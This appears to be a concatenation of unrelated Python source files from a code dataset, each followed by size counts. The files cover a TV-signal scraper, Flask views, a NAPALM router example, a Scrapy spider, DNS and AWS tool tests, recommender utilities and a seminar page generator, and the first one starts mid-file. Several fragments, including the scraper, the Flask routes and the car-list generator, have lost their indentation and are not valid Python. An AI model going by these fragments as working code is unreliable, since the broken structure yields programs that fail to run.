signalQuality,data = findWithPattern(data,"This address","signal");
for signalType in ["good","variable","poor",""]:
if (signalQuality.find(signalType)>-1):
signalQuality = signalType
break;
# Extract transmitterName
transmitterName,data = findWithPattern(data,"<strong>","</strong> transmitter");
transmitterName = transmitterName
# Extract transmitterRegion
transmitterRegion,data = findWithPattern(data,">"," region</a>");
if (transmitterRegion=="Detailed view"):
transmitterRegion=""
# Extract list of available digitalServices
digitalServices=set()
digitalService,data = findWithPattern(data,"<li class=\"reception_option ","\">")
while digitalService:
digitalServices.add(digitalService)
digitalService,data = findWithPattern(data,"<li class=\"reception_option ","\">")
DIGITAL_SEVICES = DIGITAL_SEVICES.union(set(digitalServices))
# Extract list of available channels
channels=set()
channel,data = findWithPattern(data,"<span class=\"alt\">","</span>")
while channel:
channels.add(channel)
channel,data = findWithPattern(data,"<span class=\"alt\">","</span>")
CHANNELS = CHANNELS.union(set(channels))
# Store the record into database
if log_data:
row = {'code':filename.split(".")[0],
'signalQuality':signalQuality,
'transmitterName':transmitterName,
'transmitterRegion':transmitterRegion,
'digitalServices':digitalServices,
'channels':channels}
rowStr = "{0!s},{1!s},{2!s},{3!s}".format(row['code'], row['signalQuality'], row['transmitterName'], row['transmitterRegion'])
for service in DIGITAL_SEVICES:
rowStr =rowStr + ',{0:d}'.format(int(service in row['digitalServices']))
for channel in CHANNELS:
rowStr =rowStr + ',{0:d}'.format(int(channel in row['channels']))
my_output_file.write(rowStr + "\n")
print "------------FIRST PHASE----------------"
# 1. get the DIGITAL_SEVICES and CHANNELS
scan_all_files(False)
# Set the order of DIGITAL_SEVICES and CHANNELS in the csv file
DIGITAL_SEVICES = sorted(DIGITAL_SEVICES)
CHANNELS = sorted(CHANNELS)
# Genearate the column name list
headerStr = "{0!s},{1!s},{2!s},{3!s}".format('postal.code', 'quality.terrestrial.tv.signal', 'transmitter.name', 'transmitter.region')
for service in DIGITAL_SEVICES:
headerStr =headerStr + ',service.{0!s}'.format(service)
for channel in CHANNELS:
headerStr =headerStr + ',channel.{0!s}'.format(channel)
my_output_file.write(headerStr + "\n")
print "------------SECOND PHASE----------------"
# 2. ouput into csv file for each row in MYDATABASE
scan_all_files(True)
my_output_file.close()
# ------------FINISH----------------
print "DONE"
| 5,395 | 1,617 |
import glob
import sys
import os
sys.path.insert(0,os.path.abspath("../../../src/"))
import pyabf
if __name__=="__main__":
PATH=R"X:\Data\projects\2017-01-09 AT1-Cre mice\2017-01-09 global expression NTS\data"
for fname in sorted(glob.glob(PATH+"/*.abf")):
abf=pyabf.ABF(fname)
if not abf.commentsExist:
continue
print(abf.ID,abf.commentTags)
print("DONE") | 405 | 164 |
"""keywords"""
def f(a, b=None, c=None):
return (a+b) * c
def f2(**kw):
a = 0
for key in kw:
a += kw[key]
return a
def main():
TestError( f(1, b=2, c=3) == 9) ## inorder works in javascript mode
TestError( f(1, c=3, b=2) == 9) ## out of order fails in javascript mode
TestError( f2(x=1,y=2) == 3 ) | 311 | 150 |
from flask import render_template
from flask_login import login_required
from imp_flask.blueprints import products
from imp_flask.models.imps import Product, Mod
from imp_flask.forms.product import Product as ProductForm
@products.route('/', defaults=dict(page=1))
@products.route('/page/<int:page>')
@login_required
def index(page):
if page <= 0:
page = 1
pagination = Product.query.order_by('id').paginate(page, per_page=20, error_out=False)
return render_template('imp_flask_products.html', showgroup=True, pagination=pagination)
@products.route('/group/<group>', defaults=dict(page=1))
@products.route('/group/<group>/page/<int:page>')
@login_required
def showgroup(group, page):
if page <= 0:
page = 1
pagination = Product.query.filter(Product.group == group).order_by('id').paginate(page, per_page=20, error_out=False)
return render_template('imp_flask_products.html', showgroup=False, pagination=pagination)
@products.route('/add')
@login_required
def addproduct():
form = ProductForm()
modlist = [(mod.id, mod.name) for mod in Mod.query.all()]
form.gainmods.choices = modlist
form.losemods.choices = modlist
if form.validate_on_submit():
return 'sumtin'
return render_template('imp_flask_newproduct.html', form=form, mods=Mod.query.all())
| 1,372 | 481 |
#
# Example From:
# https://xrdocs.io/application-hosting/tutorials/2016-08-15-netmiko-and-napalm-with-ios-xr-quick-look/
#
from napalm import get_network_driver
import pprint
driver = get_network_driver('iosxr')
device = driver('172.16.1.13', 'cisco', 'cisco')
device.open()
pprint.pprint(device.get_facts())
pprint.pprint(device.get_interfaces())
device.close()
| 370 | 159 |
from .segmenter import Segmenter
| 33 | 10 |
import scrapy
class VozSpider(scrapy.Spider):
name = 'voz'
start_urls = ['https://voz.vn/f/chuyen-tro-linh-tinh.17/']
custom_settings = { 'FEED_URI': "voz_%(time)s.json",
'FEED_FORMAT': 'json',
'FEED_EXPORT_ENCODING': 'utf-8'}
def parse(self, response):
print("Current URL: {}".format(response.url))
if "https://voz.vn/f/chuyen-tro-linh-tinh.17/page-2" in response.url:
return
post_urls = response.xpath('//div[@class="structItem-title"]//a/@href').extract()
for url_item in post_urls:
yield scrapy.Request('https://voz.vn' + url_item, callback=self.content_parse)
next_page = response.xpath('//a[contains(@class, "pageNav-jump--next")]//@href').get()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.parse)
def content_parse(self, response):
yield {
'url': response.url,
'title': response.xpath('//h1[contains(@class, "p-title-value")]/text()').get().strip(),
'text': '[_SEP_]'.join(response.xpath('//article[@class="message-body js-selectToQuote"]//div[contains(@class, "bbWrapper")]/text()[not(ancestor::blockquote)]').extract()).strip(),
}
next_page = response.xpath('//a[contains(@class, "pageNav-jump--next")]//@href').get()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.content_parse)
| 1,598 | 530 |
Engines = [
(1, "Diesel"),
(2, "Gasoline"),
(3, "Electric")
]
Luxuries = [
(1, "Cheap"),
(2, "Standard"),
(3, "Luxurious")
]
Companies = [
(1, 'Skoda'),
(2, 'Volvo'),
(3, 'Toyota'),
(4, 'Fiat')
]
def CalculateFuelConsumption(engineId, companyId, luxuryId):
return 100 + engineId * companyId * luxuryId + engineId
for e in Engines:
for l in Luxuries:
for c in Companies:
carName = l[1] + " " + c[1] + " " + e[1] + " car"
print "(" + \
str(c[0]) + "," + \
str(e[0]) + "," + \
str(l[0]) + "," + \
"'" + carName + "'," + \
str(CalculateFuelConsumption(e[0], c[0], l[0])) + ")," | 717 | 297 |
#
#
#
from __future__ import absolute_import, division, print_function, \
unicode_literals
from os.path import dirname, isfile, join
from unittest import TestCase
from yaml import safe_load
from yaml.constructor import ConstructorError
from octodns.record import Create
from octodns.provider.yaml import YamlProvider
from octodns.zone import SubzoneRecordException, Zone
from helpers import TemporaryDirectory
class TestYamlProvider(TestCase):
def test_provider(self):
source = YamlProvider('test', join(dirname(__file__), 'config'))
zone = Zone('unit.tests.', [])
dynamic_zone = Zone('dynamic.tests.', [])
# With target we don't add anything
source.populate(zone, target=source)
self.assertEquals(0, len(zone.records))
# without it we see everything
source.populate(zone)
self.assertEquals(18, len(zone.records))
source.populate(dynamic_zone)
self.assertEquals(5, len(dynamic_zone.records))
# Assumption here is that a clean round-trip means that everything
# worked as expected, data that went in came back out and could be
# pulled in yet again and still match up. That assumes that the input
# data completely exercises things. This assumption can be tested by
# relatively well by running
# ./script/coverage tests/test_octodns_provider_yaml.py and
# looking at the coverage file
# ./htmlcov/octodns_provider_yaml_py.html
with TemporaryDirectory() as td:
# Add some subdirs to make sure that it can create them
directory = join(td.dirname, 'sub', 'dir')
yaml_file = join(directory, 'unit.tests.yaml')
dynamic_yaml_file = join(directory, 'dynamic.tests.yaml')
target = YamlProvider('test', directory)
# We add everything
plan = target.plan(zone)
self.assertEquals(15, len(filter(lambda c: isinstance(c, Create),
plan.changes)))
self.assertFalse(isfile(yaml_file))
# Now actually do it
self.assertEquals(15, target.apply(plan))
self.assertTrue(isfile(yaml_file))
# Dynamic plan
plan = target.plan(dynamic_zone)
self.assertEquals(5, len(filter(lambda c: isinstance(c, Create),
plan.changes)))
self.assertFalse(isfile(dynamic_yaml_file))
# Apply it
self.assertEquals(5, target.apply(plan))
self.assertTrue(isfile(dynamic_yaml_file))
# There should be no changes after the round trip
reloaded = Zone('unit.tests.', [])
target.populate(reloaded)
self.assertDictEqual(
{'included': ['test']},
filter(
lambda x: x.name == 'included', reloaded.records
)[0]._octodns)
self.assertFalse(zone.changes(reloaded, target=source))
# A 2nd sync should still create everything
plan = target.plan(zone)
self.assertEquals(15, len(filter(lambda c: isinstance(c, Create),
plan.changes)))
with open(yaml_file) as fh:
data = safe_load(fh.read())
# '' has some of both
roots = sorted(data.pop(''), key=lambda r: r['type'])
self.assertTrue('values' in roots[0]) # A
self.assertTrue('geo' in roots[0]) # geo made the trip
self.assertTrue('value' in roots[1]) # CAA
self.assertTrue('values' in roots[2]) # SSHFP
# these are stored as plural 'values'
self.assertTrue('values' in data.pop('_srv._tcp'))
self.assertTrue('values' in data.pop('mx'))
self.assertTrue('values' in data.pop('naptr'))
self.assertTrue('values' in data.pop('sub'))
self.assertTrue('values' in data.pop('txt'))
# these are stored as singular 'value'
self.assertTrue('value' in data.pop('aaaa'))
self.assertTrue('value' in data.pop('cname'))
self.assertTrue('value' in data.pop('included'))
self.assertTrue('value' in data.pop('ptr'))
self.assertTrue('value' in data.pop('spf'))
self.assertTrue('value' in data.pop('www'))
self.assertTrue('value' in data.pop('www.sub'))
# make sure nothing is left
self.assertEquals([], data.keys())
with open(dynamic_yaml_file) as fh:
data = safe_load(fh.read())
# make sure new dynamic records made the trip
dyna = data.pop('a')
self.assertTrue('values' in dyna)
# self.assertTrue('dynamic' in dyna)
# TODO:
# make sure new dynamic records made the trip
dyna = data.pop('aaaa')
self.assertTrue('values' in dyna)
# self.assertTrue('dynamic' in dyna)
dyna = data.pop('cname')
self.assertTrue('value' in dyna)
# self.assertTrue('dynamic' in dyna)
dyna = data.pop('real-ish-a')
self.assertTrue('values' in dyna)
# self.assertTrue('dynamic' in dyna)
dyna = data.pop('simple-weighted')
self.assertTrue('value' in dyna)
# self.assertTrue('dynamic' in dyna)
# make sure nothing is left
self.assertEquals([], data.keys())
def test_empty(self):
source = YamlProvider('test', join(dirname(__file__), 'config'))
zone = Zone('empty.', [])
# without it we see everything
source.populate(zone)
self.assertEquals(0, len(zone.records))
def test_unsorted(self):
source = YamlProvider('test', join(dirname(__file__), 'config'))
zone = Zone('unordered.', [])
with self.assertRaises(ConstructorError):
source.populate(zone)
source = YamlProvider('test', join(dirname(__file__), 'config'),
enforce_order=False)
# no exception
source.populate(zone)
self.assertEqual(2, len(zone.records))
def test_subzone_handling(self):
source = YamlProvider('test', join(dirname(__file__), 'config'))
# If we add `sub` as a sub-zone we'll reject `www.sub`
zone = Zone('unit.tests.', ['sub'])
with self.assertRaises(SubzoneRecordException) as ctx:
source.populate(zone)
self.assertEquals('Record www.sub.unit.tests. is under a managed '
'subzone', ctx.exception.message)
| 6,912 | 1,873 |
import unittest
import os
import io
import sys
from unittest.mock import patch
from fzfaws.route53 import Route53
from fzfaws.utils import Pyfzf, FileLoader
from botocore.paginate import Paginator
from pathlib import Path
class TestRoute53(unittest.TestCase):
def setUp(self):
fileloader = FileLoader()
config_path = Path(__file__).resolve().parent.joinpath("../data/fzfaws.yml")
fileloader.load_config_file(config_path=str(config_path))
capturedOutput = io.StringIO()
sys.stdout = capturedOutput
self.route53 = Route53()
def tearDown(self):
sys.stdout = sys.__stdout__
def test_constructor(self):
self.assertEqual(self.route53.zone_ids, [""])
self.assertEqual(self.route53.profile, "default")
self.assertEqual(self.route53.region, "us-east-1")
route53 = Route53(profile="root", region="us-west-1")
self.assertEqual(route53.zone_ids, [""])
self.assertEqual(route53.profile, "root")
self.assertEqual(route53.region, "us-west-1")
@patch.object(Pyfzf, "execute_fzf")
@patch.object(Pyfzf, "process_list")
@patch.object(Paginator, "paginate")
def test_set_zone_id(self, mocked_result, mocked_fzf_process, mocked_fzf_execute):
mocked_result.return_value = [
{
"ResponseMetadata": {"HTTPStatusCode": 200, "RetryAttempts": 0,},
"HostedZones": [
{
"Id": "/hostedzone/111111",
"Name": "bilibonshop.xyz.",
"Config": {"PrivateZone": False},
"ResourceRecordSetCount": 7,
},
{
"Id": "/hostedzone/222222",
"Name": "mealternative.com.",
"Config": {
"Comment": "HostedZone created by Route53 Registrar",
"PrivateZone": False,
},
"ResourceRecordSetCount": 7,
},
],
"IsTruncated": False,
"MaxItems": "100",
}
]
# general test
mocked_fzf_execute.return_value = "111111"
self.route53.set_zone_id()
mocked_fzf_process.assert_called_with(
[
{"Id": "111111", "Name": "bilibonshop.xyz."},
{"Id": "222222", "Name": "mealternative.com."},
],
"Id",
"Name",
)
self.assertEqual(self.route53.zone_ids, ["111111"])
# parameter test
self.route53.set_zone_id(multi_select=True)
self.assertEqual(self.route53.zone_ids, ["111111"])
self.route53.set_zone_id(zone_ids=["111111", "222222"])
self.assertEqual(self.route53.zone_ids, ["111111", "222222"])
self.route53.zone_ids = [""]
self.route53.set_zone_id(zone_ids="222222")
self.assertEqual(self.route53.zone_ids, ["222222"])
# empty result test
self.route53.zone_ids = [""]
mocked_fzf_execute.reset_mock()
mocked_fzf_process.reset_mock()
mocked_fzf_execute.return_value = ""
mocked_result.return_value = []
self.route53.set_zone_id()
mocked_fzf_process.assert_not_called()
mocked_fzf_execute.assert_called_once()
self.assertEqual(self.route53.zone_ids, [""])
def test_process_hosted_zone(self):
# general
test_list = [
{
"Id": "/hostedzone/111111",
"Name": "bilibonshop.xyz.",
"Config": {"PrivateZone": False},
"ResourceRecordSetCount": 7,
},
{
"Id": "/hostedzone/222222",
"Name": "mealternative.com.",
"Config": {
"Comment": "HostedZone created by Route53 Registrar",
"PrivateZone": False,
},
"ResourceRecordSetCount": 7,
},
]
result = self.route53._process_hosted_zone(test_list)
self.assertEqual(
[
{"Id": "111111", "Name": "bilibonshop.xyz."},
{"Id": "222222", "Name": "mealternative.com."},
],
result,
)
# empty result test
test_list = []
result = self.route53._process_hosted_zone(test_list)
self.assertEqual([], result)
# missing attr test
test_list = [
{"Id": "/hostedzone/111111",},
{"Id": "/hostedzone/222222",},
]
result = self.route53._process_hosted_zone(test_list)
self.assertEqual(
[{"Id": "111111", "Name": None}, {"Id": "222222", "Name": None}], result,
)
| 4,853 | 1,582 |
from abc import ABC, abstractmethod
from keras.models import model_from_json
class BaseModel(ABC):
def __init__(self,
model_file_path=None,
weights_file_path=None,
verbosity=1):
if model_file_path:
with open(model_file_path, 'r') as model_file:
self.model = model_from_json(model_file.read())
else:
self.model = self.build_model()
self.compile_model()
if weights_file_path:
self.model.load_weights(weights_file_path)
self.verbosity = verbosity
def save_to_disk(self, model_file_path, weights_file_path):
with open(model_file_path, 'w') as model_file:
model_file.write(self.model.to_json())
self.model.save_weights(weights_file_path)
@abstractmethod
def build_model(self):
pass
@abstractmethod
def compile_model(self):
pass
@abstractmethod
def train(self, x, y, validation_data=None, callbacks=None):
pass
@abstractmethod
def evaluate(self, x, y):
pass
@abstractmethod
def predict(self, x):
pass
| 1,163 | 357 |
# Copyright 2021-2022 Boris Shminke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Useful Function for the Whole Course
====================================
"""
from typing import Optional, Tuple
import numpy as np
import pandas as pd
from implicit.nearest_neighbours import ItemItemRecommender
from rs_datasets import MovieLens
from rs_metrics import hitrate
from scipy.sparse import csr_matrix
from tqdm import tqdm
def pandas_to_scipy(
pd_dataframe: pd.DataFrame,
data_name: str,
rows_name: str,
cols_name: str,
shape: Tuple[int, int],
) -> csr_matrix:
"""
transform pandas dataset with three columns to a sparse matrix
:param data_name: column name with values for the matrix cells
:param rows_name: column name with row numbers of the cells
:param cols_name: column name with column numbers of the cells
:param shape: a pair (total number of rows, total number of columns)
:returns: a ``csr_matrix``
"""
return csr_matrix(
(
pd_dataframe[data_name].astype(float),
(pd_dataframe[rows_name], pd_dataframe[cols_name]),
),
shape=shape,
)
def movielens_split(
ratings: pd.DataFrame,
train_percentage: float,
warm_users_only: bool = False,
) -> Tuple[csr_matrix, pd.DataFrame, Tuple[int, int]]:
"""
split ``ratings`` dataset to train and test
:param ratings: ratings dataset from MovieLens
:param train_percentage: percentage of data to put into training dataset
:param warm_users_only: test on only those users, who were in training set
:returns: sparse matrix for training and pandas dataset for testing
"""
time_split = ratings.timestamp.quantile(train_percentage) # type: ignore
train = ratings[ratings.timestamp < time_split]
test = ratings[ratings.timestamp >= time_split]
if warm_users_only:
warm_users = list(set(train.user_id).intersection(set(test.user_id)))
final_test = test[test.user_id.isin(warm_users)]
else:
final_test = test
return (
train,
final_test,
(ratings.user_id.max() + 1, ratings.item_id.max() + 1),
)
def evaluate_implicit_recommender(
recommender: ItemItemRecommender,
train: csr_matrix,
test: pd.DataFrame,
split_test_users_into: int,
top_k: int,
) -> float:
"""
compute hit-rate for a recommender from ``implicit`` package
:param recommender: some recommender from ``implicit`` package
:param train: sparse matrix of ratings
:param test: pandas dataset of ratings for testing
:param split_test_users_into: split ``test`` by users into several chunks
to fit into memory
:param top_k: how many items to recommend to each user
:returns: hitrate@10
"""
all_recs = []
test_users_parts = np.array_split(
test.user_id.unique(), split_test_users_into
)
for test_users_part in tqdm(test_users_parts):
item_ids, weights = recommender.recommend(
test_users_part, train[test_users_part], top_k
)
user_recs = pd.DataFrame(
np.vstack([item_ids.reshape((1, -1)), weights.reshape((1, -1))]).T,
columns=["item_id", "weight"],
)
user_recs["user_id"] = np.repeat(test_users_part, top_k)
all_recs.append(user_recs)
all_recs_pd = pd.concat(all_recs)
return hitrate(test, all_recs_pd)
def get_sparse_item_features(
movielens: MovieLens, ratings: pd.DataFrame
) -> Tuple[csr_matrix, pd.DataFrame]:
"""
extract item features from ``tags`` dataset
:param movielens: full MovieLens dataset
:returns: sparse matrix and a `pandas` DataFrame of item features (tags)
"""
genres_data = movielens.items[["item_id", "genres"]]
genres_data["user_id"] = -1
genres_data["tag"] = genres_data.genres.str.split("|")
genres_tags = genres_data.explode("tag")[["item_id", "user_id", "tag"]]
all_tags = movielens.tags.drop(columns=["timestamp"]).append(genres_tags)
agg_tags = (
all_tags[all_tags.item_id.isin(ratings.item_id)]
.groupby(["item_id", "tag"])
.count()
.reset_index()
)
agg_tags["tag_id"] = agg_tags.tag.astype("category").cat.codes
return (
pandas_to_scipy(
agg_tags,
"user_id",
"item_id",
"tag_id",
(ratings.item_id.max() + 1, agg_tags.tag_id.max() + 1),
),
agg_tags,
)
def enumerate_users_and_items(ratings: pd.DataFrame) -> None:
"""inplace change of user and item IDs into numbers"""
ratings["user_id"] = (
ratings.user_id.astype("category").cat.codes + 1 # type: ignore
)
ratings["item_id"] = (
ratings.item_id.astype("category").cat.codes + 1 # type: ignore
)
def filter_users_and_items(
ratings: pd.DataFrame,
min_items_per_user: Optional[int],
min_users_per_item: Optional[int],
) -> pd.DataFrame:
"""
leave only items with at least ``min_users_per_item`` users who rated them
and only users who rated at least ``min_items_per_user``
:param min_items_per_user: if ``None`` then don't filter
:param min_users_per_item: if ``None`` then don't filter
:returns: filtered ratings dataset
"""
filtered_ratings = ratings
if min_items_per_user is not None:
item_counts = ratings.groupby("user_id").count().item_id
active_users = item_counts[
item_counts >= min_items_per_user
].reset_index()["user_id"]
filtered_ratings = filtered_ratings[
filtered_ratings.user_id.isin(active_users)
]
if min_users_per_item is not None:
user_counts = ratings.groupby("item_id").count().user_id
popular_items = user_counts[
user_counts >= min_users_per_item
].reset_index()["item_id"]
filtered_ratings = filtered_ratings[
filtered_ratings.item_id.isin(popular_items)
]
return filtered_ratings
| 6,504 | 2,089 |
from unittest import TestCase
import numpy as np
import numpy.testing as npt
from cavsim.base.fluids.fluid import Fluid
class TestFluid(TestCase):
def setUp(self):
self.fluid = Fluid(1, 2, 3, 4, 5, 6)
def tearDown(self):
del self.fluid
self.fluid = None
def test___init__(self):
f = Fluid(1, 2, 3, 4, 5, 6)
self.assertEqual(None, f._density_cb)
self.assertEqual(None, f._viscosity_cb)
self.assertEqual(None, f._bulk_modulus_cb)
self.assertEqual(None, f._vapor_pressure_cb)
def test__density(self):
p = self.fluid.norm_pressure
t = self.fluid.norm_temperature
self.assertEqual(self.fluid.norm_density, self.fluid._density(p, t))
answer = np.asarray([self.fluid.norm_density, self.fluid.norm_density])
result = self.fluid._density([p, p], [t, t])
self.assertEqual(answer.shape, result.shape)
npt.assert_almost_equal(result, answer)
def test__viscosity(self):
self.assertEqual(self.fluid.norm_viscosity, self.fluid._viscosity(3, 4))
answer = np.asarray([self.fluid.norm_viscosity, self.fluid.norm_viscosity])
result = self.fluid._viscosity([3, 3], [4, 4])
self.assertEqual(answer.shape, result.shape)
npt.assert_allclose(result, answer)
def test__bulk_modulus(self):
self.assertEqual(self.fluid.norm_bulk_modulus, self.fluid._bulk_modulus(5))
answer = np.asarray([self.fluid.norm_bulk_modulus, self.fluid.norm_bulk_modulus])
result = self.fluid._bulk_modulus([5, 5])
self.assertEqual(answer.shape, result.shape)
npt.assert_allclose(result, answer)
def test__vapor_pressure(self):
self.assertEqual(self.fluid.norm_vapor_pressure, self.fluid._vapor_pressure(6))
answer = np.asarray([self.fluid.norm_vapor_pressure, self.fluid.norm_vapor_pressure])
result = self.fluid._vapor_pressure([6, 6])
self.assertEqual(answer.shape, result.shape)
npt.assert_allclose(result, answer)
def test_density(self):
p = self.fluid.norm_pressure
t = self.fluid.norm_temperature
self.assertEqual(self.fluid.norm_density, self.fluid.density(p, t))
self.fluid._density_cb = lambda x, y, z: 99
self.assertEqual(99, self.fluid.density(p, t))
def test_viscosity(self):
self.assertEqual(self.fluid.norm_viscosity, self.fluid.viscosity(3, 4))
self.fluid._viscosity_cb = lambda x, y, z: 88
self.assertEqual(88, self.fluid.viscosity(3, 4))
def test_bulk_modulus(self):
self.assertEqual(self.fluid.norm_bulk_modulus, self.fluid.bulk_modulus(5))
self.fluid._bulk_modulus_cb = lambda x, y: 77
self.assertEqual(77, self.fluid.bulk_modulus(5))
def test_vapor_pressure(self):
self.assertEqual(self.fluid.norm_vapor_pressure, self.fluid.vapor_pressure(6))
self.fluid._vapor_pressure_cb = lambda x, y: 66
self.assertEqual(66, self.fluid.vapor_pressure(6))
def test_density_cb(self):
# Test getter
cb = lambda x, y, z: 99
self.assertEqual(None, self.fluid.density_cb)
self.fluid._density_cb = cb
self.assertEqual(cb, self.fluid.density_cb)
# Test setter
self.fluid.density_cb = None
self.assertEqual(None, self.fluid._density_cb)
self.fluid.density_cb = cb
self.assertEqual(cb, self.fluid._density_cb)
with self.assertRaises(TypeError):
self.fluid.density_cb = 123
def test_viscosity_cb(self):
# Test getter
cb = lambda x, y, z: 99
self.assertEqual(None, self.fluid.viscosity_cb)
self.fluid._viscosity_cb = cb
self.assertEqual(cb, self.fluid.viscosity_cb)
# Test setter
self.fluid.viscosity_cb = None
self.assertEqual(None, self.fluid._viscosity_cb)
self.fluid.viscosity_cb = cb
self.assertEqual(cb, self.fluid._viscosity_cb)
with self.assertRaises(TypeError):
self.fluid.viscosity_cb = 123
def test_bulk_modulus_cb(self):
# Test getter
cb = lambda x, y: 99
self.assertEqual(None, self.fluid.bulk_modulus_cb)
self.fluid._bulk_modulus_cb = cb
self.assertEqual(cb, self.fluid.bulk_modulus_cb)
# Test setter
self.fluid.bulk_modulus_cb = None
self.assertEqual(None, self.fluid._bulk_modulus_cb)
self.fluid.bulk_modulus_cb = cb
self.assertEqual(cb, self.fluid._bulk_modulus_cb)
with self.assertRaises(TypeError):
self.fluid.bulk_modulus_cb = 123
def test_vapor_pressure_cb(self):
# Test getter
cb = lambda x, y: 99
self.assertEqual(None, self.fluid.vapor_pressure_cb)
self.fluid._vapor_pressure_cb = cb
self.assertEqual(cb, self.fluid.vapor_pressure_cb)
# Test setter
self.fluid.vapor_pressure_cb = None
self.assertEqual(None, self.fluid._vapor_pressure_cb)
self.fluid.vapor_pressure_cb = cb
self.assertEqual(cb, self.fluid._vapor_pressure_cb)
with self.assertRaises(TypeError):
self.fluid.vapor_pressure_cb = 123
| 5,194 | 1,928 |
#!/usr/bin/env python3
'''
Input is a group of one or more lines with letters.
Each letter = question to which the answer was 'yes'.
Each line represents survey answers by a person, contains one or more letter.
Adjacent lines are part of the same group.
For each group, count the number of questions to which all people answered 'yes'
'''
g_file = 'input.txt'
#------------------------------------------------------------------------------
def run():
#------------------------------------------------------------------------------
l_all_groups = list()
l_curr_group = list()
for l_line in open(g_file).readlines():
l_line = l_line.rstrip()
if len(l_line) == 0:
# end of group, evaluate the current group's answers
l_tmp = None
for l_person in l_curr_group:
if l_tmp == None:
l_tmp = l_person
else:
l_tmp = l_tmp.intersection(l_person)
l_all_groups.append(l_tmp)
l_curr_group = list()
continue
l_person = set()
for l_idx in range(len(l_line)):
l_person.add(l_line[l_idx])
l_curr_group.append(l_person)
if len(l_curr_group) > 0:
l_tmp = None
for l_person in l_curr_group:
if l_tmp == None:
l_tmp = l_person
else:
l_tmp = l_tmp.intersection(l_person)
l_all_groups.append(l_tmp)
# now count
l_sum = 0
for l_idx, l_entry in enumerate(l_all_groups):
l_sum += len(l_entry)
print("Group {}: {} ({})".format(l_idx, len(l_entry), l_entry))
print("Count is {}".format(l_sum))
#------------------------------------------------------------------------------
def main():
#------------------------------------------------------------------------------
run()
main() | 1,738 | 551 |
import nni
def max_pool(k):
pass
h_conv1 = 1
nni.choice({'foo': foo, 'bar': bar})(1)
conv_size = nni.choice({2: 2, 3: 3, 5: 5, 7: 7}, name='conv_size')
abc = nni.choice({'2': '2', 3: 3, '(5 * 6)': 5 * 6, 7: 7}, name='abc')
h_pool1 = nni.function_choice({'max_pool': lambda : max_pool(h_conv1),
'h_conv1': lambda : h_conv1,
'avg_pool': lambda : avg_pool(h_conv2, h_conv3)}
)
h_pool1 = nni.function_choice({'max_pool(h_conv1)': lambda : max_pool(
h_conv1), 'avg_pool(h_conv2, h_conv3)': lambda : avg_pool(h_conv2,
h_conv3)}, name='max_pool')
h_pool2 = nni.function_choice({'max_poo(h_conv1)': lambda : max_poo(h_conv1
), '(2 * 3 + 4)': lambda : 2 * 3 + 4, '(lambda x: 1 + x)': lambda : lambda
x: 1 + x}, name='max_poo')
tmp = nni.qlognormal(1.2, 3, 4.5)
test_acc = 1
nni.report_intermediate_result(test_acc)
test_acc = 2
nni.report_final_result(test_acc)
| 882 | 433 |
from __future__ import annotations
import calendar
import logging
import os
from dataclasses import dataclass
from datetime import datetime
import dateparser
import requests
from markdown import markdown
def request_github_api(
query_url: str, owner="geem-lab", token=None, logger=None
) -> dict:
if token is None:
token = os.environ.get("GITHUB_TOKEN", None)
gh_session = requests.Session()
gh_session.auth = (owner, token)
params = {"state": "all"}
authorization = f"token {token}"
headers = {
"Accept": "application/vnd.github.v3+json",
"Authorization": authorization,
}
response = gh_session.get(query_url, headers=headers, params=params).json()
if "message" in response and response["message"] == "Bad credentials":
raise PermissionError(
"Github API token is invalid. Please set the GITHUB_TOKEN environment variable."
)
if logger is not None:
logger.info(f"{query_url} returned:\n'{response}'")
return response
def tag(tag_name):
def _tag(*args, **kwargs):
def _normalize_key(key):
if key.endswith("_"):
return key[:-1]
return key
attrs = " ".join(f'{_normalize_key(k)}="{v}"' for k, v in kwargs.items())
contents = "".join(arg for arg in args if arg)
if attrs and contents:
return f"<{tag_name} {attrs}>{contents}</{tag_name}>"
if attrs:
return f"<{tag_name} {attrs} />"
if contents:
return f"<{tag_name}>{contents}</{tag_name}>"
return f"<{tag_name} />"
return _tag
em = tag("em")
time = tag("time")
h2 = tag("h2")
p = tag("p")
strong = tag("strong")
a = tag("a")
details = tag("details")
summary = tag("summary")
span = tag("span")
li = tag("li")
ul = tag("ul")
small = tag("small")
img = tag("img")
@dataclass
class Seminar:
title: str
speaker: dict
description: str
date: datetime
STRFTIME_FORMAT = "%b %-d %Y"
def __post_init__(self):
if isinstance(self.speaker, str):
self.speaker = request_github_api(
f"https://api.github.com/users/{self.speaker}"
)
def _date_to_markdown(self):
dt = time(
"📅 ",
self.date.strftime(self.STRFTIME_FORMAT),
datetime=self.date.isoformat(),
)
return small(strong(dt))
def _title_to_markdown(self):
return em(self.title)
@property
def speaker_name(self):
if "name" in self.speaker and self.speaker["name"]:
return self.speaker["name"]
return f"@{self.speaker['login']}"
@property
def speaker_url(self):
return f"https://github.com/{self.speaker['login']}"
def _speaker_name_to_markdown(self):
return a(self.speaker_name, href=self.speaker_url)
AVATAR_WIDTH = 128
def _speaker_avatar_to_markdown(self):
if "avatar_url" in self.speaker:
return a(
img(
src=self.speaker["avatar_url"],
alt=self.speaker["login"],
title=self.speaker_name,
align="left",
width=self.AVATAR_WIDTH,
),
href=self.speaker_url,
)
return None
def _description_to_markdown(self):
return markdown(self.description)
def to_markdown(self):
return details(
summary(
self._date_to_markdown(),
" ",
self._title_to_markdown(),
" (",
self._speaker_name_to_markdown(),
")",
),
self._speaker_avatar_to_markdown(),
self._description_to_markdown(),
)
DATE_MARKER = "**Date**:"
SEMINAR_TITLE_MARKER = "[SEMINAR]"
@classmethod
def from_github_issue(cls, issue, logger=None):
title = issue["title"].replace(cls.SEMINAR_TITLE_MARKER, "").strip()
description, date = issue["body"].split(cls.DATE_MARKER)[:2]
description = description.rstrip(cls.DATE_MARKER).strip()
date = date.splitlines()[0].strip()
date = dateparser.parse(date)
if issue["assignees"]:
speaker = issue["assignees"][0]["login"]
else:
speaker = issue["user"]["login"]
seminar = Seminar(
title=title, speaker=speaker, description=description, date=date
)
if logger is not None:
logger.info(f"seminar: {seminar}")
return seminar
